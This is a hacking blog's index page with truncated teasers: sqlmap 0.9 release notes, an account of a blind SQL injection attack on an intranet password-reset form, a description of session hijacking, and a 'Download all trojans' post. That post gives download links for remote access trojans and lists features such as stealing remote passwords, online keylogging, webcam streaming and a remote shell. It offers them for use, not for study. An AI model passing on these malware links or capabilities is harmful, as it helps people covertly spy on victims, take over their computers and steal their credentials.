Skip to main content

Posts

Hack Tools

SQLMap 0.9 Released – SQL Injection Tool After a year of hardcore development, sqlmap 0.9 is out! Introduction: sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. New Features: Rewritten SQL injection detection engine Support to directly connect to the database without passing via a SQL injection, -d switch Added full support for both time-based blind SQL injection and error-based SQL injection techniques Implemented support for SQLite 2 and 3 Implemented support for Firebird Implemented support for Microsoft Access, Sybase and SAP MaxDB Added s...
Post a Comment
Read more

Download all trojans

Download all trojans   Spy-Net [RAT] v1.7   Download : http://www.mediafire.com/?5sqm3s5uwfsfllj   Nuclear RAT 2.1.0   * Programmed by: Caesar2k * Date added / updated: September 4th 2007 * Downloads : 80685 * File size: 1.26MB * Coded in: Delphi * Section: Remote Administration Tools & Spy * Compatibility: Windows NT, 2K, XP, Vista Download : http://www.nuclearwintercrew.com/Products-View/21/Nuclear_RAT_2.1.0/ Turkojan 4   Features : * Reverse Connection * Remote Desktop(very fast) * Webcam Streaming (very fast) * Audio Streaming * Thumbnail viewer * Remote passwords * MSN Sniffer * Remote Shell * Web-Site Blocking * Chat with server * Send fake messages * Advanced file manager * Zipping files&folders * Find files * Change remote screen resolution * Mouse manager * Information about remote computer * Clipboard manager * IE options * Running Process * Service Manager * Keyboard Manager * Online keylogger * Off...
Post a Comment
Read more

SQL injection attack

SQL injection attack The Target Intranet This appeared to be an entirely custom application, and we had no prior knowledge of the application nor access to the source code : this was a "blind" attack. A bit of poking showed that this server ran Microsoft's IIS 6 along with ASP.NET, and this suggested that the database was Microsoft's SQL server: we believe that these techniques can apply to nearly any web application backed by any SQL server. The login page had a traditional username-and-password form, but also an email-me-my-password link; the latter proved to be the downfall of the whole system. When entering an email address, the system presumably looked in the user database for that email address, and mailed something to that address. Since my email address is not found, it wasn't going to send me anything. So the first test in any SQL-ish form is to enter a single quote as part of the data: the intention is to see if they construct an SQL...
Post a Comment
Read more

Session Hijacking

What is Session Hijacking? Session Hijacking Session hijacking is the act of taking control of a user session after successfully obtaining or generating an authentication session ID. Session hijacking involves an attacker using captured, brute forced or reverse-engineered session IDs to seize control of a legitimate user's Web application session while that session is still in progress. Detailed Description HTTP is stateless, so application designers had to develop a way to track the state between multiple connections from the same user, instead of requesting the user to authenticate upon each click in a Web application. A session is a series of interactions between two communication end points that occurs during the span of a single connection. When a user logs into an application a session is created on the server in order to maintain the state for other requests originating from the same user. Applications use sessions to store parameters which are relevan...
Post a Comment
Read more